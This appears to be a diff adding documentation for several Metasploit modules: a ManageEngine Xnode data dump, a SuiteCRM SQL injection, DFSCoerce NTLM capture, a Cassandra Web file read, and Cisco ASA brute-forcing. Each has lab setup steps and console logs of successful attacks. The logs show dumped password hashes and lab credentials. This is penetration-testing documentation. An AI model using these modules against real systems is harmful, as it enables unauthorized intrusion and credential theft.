+- Open the Xnode config file at `<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf`
+- Note down the username and password
+- Insert the following line:
+```
+xnode.connector.accept_remote_request = true
+```
+To launch DataSecurity Plus, run Command Prompt as administrator and run: `<install_dir>\bin\run.bat`
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/manageengine_datasecurity_plus_xnode_enum`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Options
+### CONFIG_FILE
+YAML File specifying the data repositories (tables) and fields (columns) to dump.
+
+### DUMP_ALL
+Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+
+## Scenarios
+### ManageEngine DataSecurity Plus 6.0.1 (6010) on Windows Server 2012
+```
+msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > options 
+
+Module options (auxiliary/gather/manageengine_datasecurity_plus_xnode_enum):
+
+   Name         Current Setting                                                Required  Description
+   ----         ---------------                                                --------  -----------
+   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ine_xnode/CVE-2020-11532/datasecurity_plus_xnode_conf.yaml
+   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29119                                                          yes       The target port (TCP)
+   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > run
+[*] Running module against 192.168.1.41
+
+[*] 192.168.1.41:29119 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.41:29119 - Target seems to be Xnode.
+[+] 192.168.1.41:29119 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.41:29119 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.41:29119 - Target is running Xnode version: "XNODE_1_0_0".
+[*] 192.168.1.41:29119 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\DataSecurity Plus\apps\dataengine-xnode".
+[*] 192.168.1.41:29119 - Data repository DSPEmailAuditAttachments is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEmailAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointClassificationReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointIncidentReport is empty.
+[*] 192.168.1.41:29119 - Data repository DspEndpointPrinterAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DspEndpointWebAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPFileAnalysisAlerts is empty.
+[*] 192.168.1.41:29119 - Data repository RAAlertHistory is empty.
+[*] 192.168.1.41:29119 - Data repository RAIncidents is empty.
+[*] 192.168.1.41:29119 - Data repository RAViolationRecords is empty.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,195 @@
+## Description
+This module exploits an authenticated SQL injection in SuiteCRM installations below or equal to version 7.12.5. The 
+vulnerability allows for union and blind boolean based SQLi to be exploited in order to collect usernames and password 
+hashes from the SuiteCRM database.
+
+## Vulnerable Application
+
+The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM.
+There should be one in SuiteCRM by default for the administrative user. If you want to test multiple users,
+browse to `/index.php?module=Users&action=index` and then click the `Create New User` button on the left side
+of the screen. Then enter a username and a last name. Then click the `password` tab, and enter a password for
+the user, then confirm this password and click the `Save` button to create the user.
+
+### Docker compose
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+To create a SuiteCRM 7.12.5 Docker container, first create a new folder, 
+then save the following content as `docker-compose.yml`:
+
+```
+version: '2'
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_suitecrm
+      - MARIADB_DATABASE=bitnami_suitecrm
+      - MARIADB_PASSWORD=bitnami123
+    volumes:
+      - 'mariadb_data:/bitnami/mariadb'
+  suitecrm:
+    image: docker.io/bitnami/suitecrm:7.12.5
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - SUITECRM_DATABASE_HOST=mariadb
+      - SUITECRM_DATABASE_PORT_NUMBER=3306
+      - SUITECRM_DATABASE_USER=bn_suitecrm
+      - SUITECRM_DATABASE_NAME=bitnami_suitecrm
+      - SUITECRM_DATABASE_PASSWORD=bitnami123
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'suitecrm_data:/bitnami/suitecrm'
+    depends_on:
+      - mariadb
+volumes:
+  mariadb_data:
+    driver: local
+  suitecrm_data:
+    driver: local 
+```
+
+Finally, in the same directory as the `docker-compose.yml` file, run: `docker-compose up -d`.
+
+Note that the default username to log in will be `user` and the password will be `bitnami`. If you
+want to change these, put the following lines under the `environment` section:
+
+```
+    environment:
+      - SUITECRM_USERNAME=my_user
+      - SUITECRM_PASSWORD=my_password
+```
+
+The above would set the username to `my_user` and the password to `my_password`.
+
+For more information on the docker compose file, refer to
+https://github.com/bitnami/containers/tree/main/bitnami/suitecrm.
+
+### Install from source
+
+Source code can be found here: [SuiteCRM v7.12.5](https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz) 
+
+Instructions on installing from source can be found here: [Installation Guide](https://docs.suitecrm.com/admin/installation-guide/downloading-installing/) 
+
+The following setup was installed on Ubuntu 20.04:
+
+1. Setup and install MySQL:
+    1. `sudo apt update`
+    1. `sudo apt install mysql-server`
+    1. `sudo systemctl start mysql.service`
+    1. `sudo mysql` (open the mysql prompt)
+    1. `mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';` (change the password 
+       of the root user)
+       
+1. Install Apache
+    1. `sudo apt install apache2`
+    1. `sudo systemctl enable apache2`
+    1. `sudo systemctl start apache2`
+       
+1. Install php and its dependencies
+    1. `sudo apt -y install php7.4`
+    1. `sudo apt install -y php-cli php-common php-curl php-mbstring php-gd php-mysql php-soap php-xml php-imap php-intl php-opcache php-json php-zip`
+    1. `sudo apt install composer`
+    1. `composer install`
+    
+1. Setup and install SuiteCRM 7.12.5
+    1. `wget https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz`
+    1. `gunzip v7.12.5.tar.gz`
+    1. `tar -xvf v7.12.5.tar`
+    1. `sudo cp -r SuiteCRM-7.12.5/. /var/www/html`
+    1. `cd /var/www/html`
+    1. `sudo chown -R www-data:www-data .`
+    1. `sudo chmod -R 755 .`
+    1. `sudo chmod -R 775 custom modules themes data upload`
+    1. `sudo chmod 775 config_override.php 2>/dev/null`
+    1. Navigate to http://localhost/install.php and follow the installation wizard to complete the install
+    
+
+## Verification Steps
+
+1. Start up metasploit
+1. Do: `use auxiliary/gather/suite_crm_export_sqli`
+1. Do: `set RHOSTS [IP]`
+1. Configure a user and password by setting `USERNAME` and `PASSWORD`.
+1. Do: `run`
+
+## Scenarios
+
+### SuiteCRM 7.12.5 Bitnami Docker Image
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/suite_crm_export_sqli 
+msf6 auxiliary(gather/suite_crm_export_sqli) > show options
+
+Module options (auxiliary/gather/suite_crm_export_sqli):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   COUNT     3                no        Number of users to enumerate
+   PASSWORD                   yes       Password for user
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
+                                        loit
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       Username of user
+   VHOST                      no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name              Description
+   ----              -----------
+   Dump credentials  Dumps usernames and passwords from the users table
+
+
+msf6 auxiliary(gather/suite_crm_export_sqli) > set USERNAME user
+USERNAME => user
+msf6 auxiliary(gather/suite_crm_export_sqli) > set PASSWORD bitnami
+PASSWORD => bitnami
+msf6 auxiliary(gather/suite_crm_export_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/suite_crm_export_sqli) > check
+
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] 127.0.0.1:80 - The target is vulnerable.
+msf6 auxiliary(gather/suite_crm_export_sqli) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] The target is vulnerable.
+[*] Fetching Users, please wait...
+SuiteCRM User Names
+===================
+
+ Username
+ --------
+ testuser
+ user
+
+[*] Fetching Hashes, please wait...
+[+] (1/2) Username : testuser ; Hash : $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+[+] (2/2) Username : user ; Hash : $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+SuiteCRM User Credentials
+=========================
+
+ Username  Hash
+ --------  ----
+ testuser  $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+ user      $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/suite_crm_export_sqli) > 
+```
@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/dcerpc/dfscoerce`
+4. Set the `RHOSTS` and `LISTENER` options
+5. Set the `SMBUser`, `SMBPass` for authentication
+6. (Optional) Set the `METHOD` options to adjust the trigger vector
+7. Do: `run`
+
+## Options
+
+### LISTENER
+The host listening for the incoming connection. The target will authenticate to this host using SMB. The listener host
+should be hosting some kind of capture or relaying service.
+
+### METHOD
+The RPC method to use for triggering.
+
+## Scenarios
+
+### Windows Server 2019
+In this case, Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine
+account. The target is a 64-bit Windows Server 2019 domain controller.
+
+```
+msf6 > use auxiliary/server/capture/smb 
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(server/capture/smb) > 
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+
+msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
+
+[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
+[*] 192.168.159.96:445    - Binding to \netdfs...
+[+] 192.168.159.96:445    - Bound to \netdfs
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv2-SSP Client     : 192.168.250.237
+[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
+[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
+
+[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
+[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/dcerpc/dfscoerce) >
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+[Cassandra Web](https://rubygems.org/gems/cassandra-web) is an interface for Apache Cassandra using Ruby, Event-machine, AngularJS,
+Server-Sent-Events and DataStaxRuby driver for Apache Cassandra.
+
+This module has been tested successfully on Cassandra Web versions:
+* cassandra-web-0.5.0 on Debian 10.11 (buster) with ruby 2.5.5p157 and Apache Cassandra 3.11.13
+
+### Description
+
+This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web
+'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
+This vulnerability occured due to the disabled Rack::Protection module.
+
+This web service listens on TCP port 3000 by default on all network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/avalanche123/cassandra-web)
+* [Installers](https://rubygems.org/gems/cassandra-web)
+
+Ruby installation:
+```
+apt install ruby-full -y
+```
+
+Gem installation:
+```
+gem install cassandra-web
+```
+
+Apache Cassandra Installation:
+```
+cat << EOF > /etc/apt/sources.list.d/cassandra.list
+deb https://www.apache.org/dist/cassandra/debian 311x main
+EOF
+cat << EOF > /etc/apt/sources.list.d/adoptopenjdk.list
+deb https://adoptopenjdk.jfrog.io/adoptopenjdk/deb/ buster main
+EOF
+wget -q -O - https://www.apache.org/dist/cassandra/KEYS | apt-key add -
+wget -qO - https://adoptopenjdk.jfrog.io/adoptopenjdk/api/gpg/key/public | apt-key add -
+apt update && apt install adoptopenjdk-8-hotspot cassandra -y
+```
+
+Run Cassandra Web:
+```
+cassandra-web
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/http/cassandra_web_file_read.rb`
+2. Do: `set RHOSTS [ips]`
+3. Do: `run`
+
+## Options
+
+## Scenarios
+### Cassandra Web 0.5.0 Linux Debian 10.11 (Ruby 2.5.5p157 and Apache Cassandra 3.11.13)
+```
+msf6 > use auxiliary/scanner/http/cassandra_web_file_read
+msf6 auxiliary(scanner/http/cassandra_web_file_read) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/http/cassandra_web_file_read) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Cassandra Web Detected
+[*] Downloading file...
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
+avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+ntp:x:107:115::/nonexistent:/usr/sbin/nologin
+cassandra:x:108:116:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
+
+
+[+] File saved in: /home/git/.msf4/loot/20220802185716_default_192.168.56.1_cassandra.web.tr_160962.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,132 @@
+## Vulnerable Application
+
+### Description
+
+This module scans for the Cisco ASA ASDM landing page and performs login brute-force
+to identify valid credentials.
+
+### Installation
+
+Acquire a Cisco ASA device or virtual machine. For this description we will use
+Cisco Adaptive Security Virtual Appliance (ASAv) VMWare Package 9.18.1 (asav9-18-1.zip):
+
+* https://software.cisco.com/download/home/286119613/type/280775065/release/9.18.1
+
+The [official installation guide can be found here](https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asav/quick-start-book/asav-98-qsg/asav-vmware.html)
+But for completeness, the following will guide the user to a full testing configuration.
+To start we'll make ASDM remotely accessible:
+
+1. Unzip the package
+1. Import `asav-esxi.ovf` in VMWare Fusion (or your VMWare product of choice).
+1. Select the `ASAv5 - 1 Core / 2 GB (100 Mbps)` deployment option.
+1. After the import is complete, assign `Network Adapter` (1 is implied) the desired
+interface (e.g. I'll use `Wi-Fi` for my setup).
+1. Start the virtual machine
+1. Allow GRUB to boot the first option (this should happen twice)
+1. When provided with a command prompt (`ciscoasa>`) type `en`.
+1. Set an enable password (e.g. `labpass1`)
+1. Enter the following in the command line interface:
+1. `conf t`
+1. `No`
+1. `interface GigabitEthernet 0/0`
+1. `nameif outside`
+1. Assign a static ip address (note the assigned address should make sense within the
+context of you lab. For example, my lab network is 10.9.49.0/24): `ip address 10.9.49.201 255.255.255.0`
+1. `no shutdown`
+1. `exit`
+1. Set the default route (the last IP should point to your lab router): `route outside 0.0.0.0 0.0.0.0 10.9.49.1`
+1. Verify you can ping an outside host (e.g. `ping 8.8.8.8`)
+1. `http server enable`
+1. `http 0.0.0.0 0.0.0.0 outside`
+1. `write`
+1. `exit`
+
+You should now be able to reach the ASA's web server remotely. From a remote host, execute the following `curl`
+command to the ASA to verify as much:
+
+```
+albinolobster@ubuntu:~$ curl -kv https://10.9.49.201
+*   Trying 10.9.49.201:443...
+* TCP_NODELAY set
+...
+> GET / HTTP/1.1`
+> Host: 10.9.49.201
+> User-Agent: curl/7.68.0
+> Accept: */*
+> 
+* Mark bundle as not supporting multiuse
+< HTTP/1.1 301 Moved Permanently
+< Date: Tue, 21 Jun 2022 13:52:33 UTC
+< Strict-Transport-Security: max-age=31536000
+< X-XSS-Protection: 1
+< Connection: close
+< Location: /admin/public/index.html
+< 
+* Closing connection 0
+* TLSv1.2 (OUT), TLS alert, close notify (256):
+```
+
+You should now be able to test the credentials `<Blank>:labpass1` and `enable_15:labpass1`. To
+add additional users to test with, let's use ASDM from a Windows machine:
+
+1. Connect to your ASA's web interface (e.g. `https://10.9.49.201/admin/public/index.html`).
+1. Click "Install ASDM Launcher"
+1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password)
+1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned)
+1. If Java isn't installed, install Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
+1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat`
+1. Enter your ASAv's IP address (10.9.249.201)
+1. Enter a blank username
+1. Enter the enable password (`labpass1`)
+1. Go to `Configuration -> Device Management -> Users/AAA -> User Accounts`
+1. Click `Add`
+1. Set the username to `cisco`
+1. Set the password to `cisco123`
+1. Keep the default settings for `Access Restrictions` (Full access with privilege level of 2).
+1. Hit `OK`
+1. Hit `Apply`
+
+You should now be able to log in to the ASDM using `cisco`:`cisco123`.
+
+## Verification Steps
+
+* Follow the above instructions to configure ASAv, ASDM, and add the `cisco` user for testing
+* Do: `use auxiliary/scanner/http/cisco_asa_asdm_bruteforce`
+* Do: `set RHOST <ip>`
+* Do: `set VERBOSE false`
+* Do: `run`
+* You should see output indicating `cisco:cisco123` was successfully used for login.
+
+## Options
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line.
+
+### USER_FILE
+
+File containing users, one per line.
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+## Scenarios
+
+### ASAv 9.18.1 with ASDM enabled and the `cisco:cisco123` creds set.
+
+```
+msf6 > use auxiliary/scanner/http/cisco_asa_asdm_bruteforce
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > run
+
+[*] The remote target appears to host Cisco ASA ASDM. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "cisco":"cisco123"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > 
+```
@@ -0,0 +1,196 @@
+## Vulnerable Application
+
+### Description
+
+This module scans for Cisco ASA Clientless SSL VPN (WebVPN) web login portals and
+performs login brute-force to identify valid credentials.
+
+### Installation
+
+Acquire a Cisco ASA device or virtual machine. For this description we will use
+Cisco Adaptive Security Virtual Appliance (ASAv) VMWare Package 9.18.1 (asav9-18-1.zip):
+
+* https://software.cisco.com/download/home/286119613/type/280775065/release/9.18.1
+
+The [official installation guide can be found here](https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asav/quick-start-book/asav-98-qsg/asav-vmware.html)
+But for completeness, the following will guide the user to a full testing configuration.
+To start we'll make ASDM remotely accessible:
+
+1. Unzip the package
+1. Import `asav-esxi.ovf` in VMWare Fusion (or your VMWare product of choice).
+1. Select the `ASAv5 - 1 Core / 2 GB (100 Mbps)` deployment option.
+1. After the import is complete assign `Network Adapter` (1 is implied) the desired
+interface (e.g. I'll use `Wi-Fi` for my setup).
+1. Start the virtual machine
+1. Allow GRUB to boot the first option (this should happen twice)
+1. When provided with a command prompt (`ciscoasa>`) type `en`.
+1. Set an enable password (e.g. `labpass1`)
+1. Enter the following in the command line interface:
+1. `conf t`
+1. `No`
+1. `interface GigabitEthernet 0/0`
+1. `nameif outside`
+1. Assign a static ip address (note the assigned address should make sense within the
+context of you lab. For example, my lab network is 10.9.49.0/24): `ip address 10.9.49.201 255.255.255.0`
+1. `no shutdown`
+1. `exit`
+1. Set the default route (the last IP should point to your lab router): `route outside 0.0.0.0 0.0.0.0 10.9.49.1`
+1. Verify you can ping an outside host (e.g. `ping 8.8.8.8`)
+1. `http server enable`
+1. `http 0.0.0.0 0.0.0.0 outside`
+1. `write`
+1. `exit`
+
+You should now be able to reach the ASA's web server remotely. From a remote host, execute the following `curl`
+command to the ASA to verify as much:
+
+```
+albinolobster@ubuntu:~$ curl -kv https://10.9.49.201
+*   Trying 10.9.49.201:443...
+* TCP_NODELAY set
+...
+> GET / HTTP/1.1`
+> Host: 10.9.49.201
+> User-Agent: curl/7.68.0
+> Accept: */*
+> 
+* Mark bundle as not supporting multiuse
+< HTTP/1.1 301 Moved Permanently
+< Date: Tue, 21 Jun 2022 13:52:33 UTC
+< Strict-Transport-Security: max-age=31536000
+< X-XSS-Protection: 1
+< Connection: close
+< Location: /admin/public/index.html
+< 
+* Closing connection 0
+* TLSv1.2 (OUT), TLS alert, close notify (256):
+```
+
+The next part of the installation will require a Windows machine. From your Windows machine:
+
+1. Connect to your ASA's web interface (e.g. `https://10.9.49.201/admin/public/index.html`).
+1. Click "Install ASDM Launcher"
+1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password)
+1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned)
+1. If Java isn't installed, intall Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
+1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat`
+1. Enter your ASAv's IP address (10.9.249.201)
+1. Enter a blank username
+1. Enter the enable password (`labpass1`)
+
+Now to enable the webvpn interface from ASDM:
+
+1. Go to `Configuration -> Remote Access VPN -> Clientless SSL VPN Access -> Connection Profiles`
+1. In the `Access Interfaces` view, click the radio button to `Allow Access` from the `outside` interface
+1. Hit apply
+
+Verify that the Clientless SSL VPN is now enabled by navigating to the SSL VPN login on your ASA. For example,
+navigate to `https://10.9.49.201/+CSCOE+/logon.html`.
+
+Next, we'll create a Clientless SSL VPN user for brute-force testing. From ASDM:
+
+1. Go to `Configuration -> Device Management -> Users/AAA -> User Accounts`
+1. Click `Add`
+1. Keep the default username (`user1`)
+1. Enter and confirm a password (e.g. `user1`)
+1. Set the privilege level to 0 (I'm not sure this step is actually required but)
+1. Select the `No ASDM, SSH, Telnet, or Console access` radio
+1. Hit `OK`
+1. Hit `Apply`
+
+Finally, we'll enable logging into the SSL VPN portal:
+
+1. Go to `Configuration -> Device Management -> Users/AAA -> Dynamic Access Policies`
+1. Select the `DfltAccessPolicy` and click `Edit`
+1. Select `Access Method` tab
+1. Click on the `Web-Portal` radio button
+
+You should now be able to log in to the SSL VPN web portal using `user1`:`user1`.
+
+## Verification Steps
+
+* Follow the above instructions to configure ASAv, Clientless SSL VPN, and add a user for testing
+* Add the user to `data/wordlists/http_default_userpass.txt` as `user1 user1`
+* Do: `use auxiliary/scanner/http/cisco_asa_clientless_vpn`
+* Do: `set RHOST <ip>`
+* Do: `set VERBOSE false`
+* Do: `run`
+* You should see output indicating `user1:user1` was successfully used for login.
+
+## Options
+
+### GROUP
+
+The connection profile to use. By default this is blank, but administrators can configure various different
+profiles that users can select from the drop down menu at the top of the login page. The alias in the drop
+down is *not* the value of `GROUP`. You need to extract it from the HTML.
+
+For example, my administrator has a profile named `TunnelGroup1` using the alias `alias1`. The drop down menu
+will show `alias1` but `TunnelGroup1` is the required value. In the page's HTML you'll find:
+
+```
+<option value="TunnelGroup1" selected>alias1</option>
+```
+
+To use `TunnelGroup1` you'd `set GROUP TunnelGroup1`.
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line.
+
+### USER_FILE
+
+File containing users, one per line.
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+## Scenarios
+
+### ASAv 9.18.1 with Clientless SSL VPN enabled and the `user1:user1` creds set.
+
+Simply using the default HTTP username and password lists and `user1:user1` added to
+`data/wordlists/http_default_userpass.txt`.
+
+```
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > use auxiliary/scanner/http/cisco_asa_clientless_vpn
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "user1":"user1"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > 
+```
+
+## ASAv 9.18.1 with Clientless SSL VPN enabled and the `user1:user1` on the `TunnelGroup1` Connection Profile
+
+```
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > use auxiliary/scanner/http/cisco_asa_clientless_vpn
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set GROUP TunnelGroup1
+GROUP => TunnelGroup1
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "user1":"user1"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > 
+```
@@ -0,0 +1,65 @@
+## Vulnerable Application
+[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication,
+WebRTC, telecommunications, video, and Voice over Internet Protocol.
+
+The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to
+control FreeSWITCH and is enabled by default.
+
+This module has been tested successfully on FreeSWITCH versions:
+* 1.10.7-release-19-883d2cb662~64bit on Debian 10.11 (buster)
+
+### Description
+
